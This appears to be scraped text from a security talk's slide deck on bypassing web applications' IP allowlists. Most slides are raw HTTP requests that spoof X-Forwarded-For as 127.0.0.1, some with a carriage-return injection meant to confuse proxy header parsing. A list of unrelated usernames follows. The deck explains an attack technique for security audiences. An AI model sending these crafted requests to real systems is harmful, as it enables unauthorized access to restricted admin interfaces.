Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.
At Home AmongStrangersBypassing IP white sheets of some web applicationsdue to incorrect parsing of HTTP request headers.
View Slide
Reverse Proxy
X-Forwarded-For: , X-Forwarded-For: , ,
HTTP-requestGET / HTTP/1.1 Host: admin.my.site Connection: closeGET / HTTP/1.1 Host: admin.my.site X-Forwarded-For: 123.123.123.123, 192.168.1.1 Connection: closeX-Forwarded-For: ,
XFF/XRI SpoofingGET / HTTP/1.1 Host: admin.my.siteX-Forwarded-For: 127.0.0.1 Connection: closeGET / HTTP/1.1 Host: admin.my.site X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1 Connection: closeX-Forwarded-For: , ,
HTTP-requestGET / HTTP/1.1\r\n Host: admin.my.site\r\n X-Forwarded-For: 127.0.0.1\r\n Connection: close\r\n\r\nX-Forwarded-For: , ,
HTTP-request with 0dGET / HTTP/1.1\r\n Host: admin.my.site\r\n X-Forwarded-For: 127.0.0.1\r\r\n Connection: close\r\n\r\nX-Forwarded-For: \r, ,
XFF/XRI Spoofing+GET / HTTP/1.1\r\n Host: admin.my.site\r\n X-Forwarded-For: 127.0.0.1\r\r\n Connection: close\r\n\r\nGET / HTTP/1.1 Host: admin.my.site X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1 Connection: closeX-Forwarded-For: , , Tomcat?WebSphere?
Twi: @i_bo0omSite: bo0om.ruTelegram: @webpwn
bo0om
ryou0634
satotaichi
matsui_528
ftsrg
masakat0
morishtr
yukiar
schulta
rpc
elix
hsato
ahspragu
tanoku
shpigford
destraynor
sugarenia
deanohume
jmmastey
tmm1
chrislema
jonyablonski
orderedlist
ammeep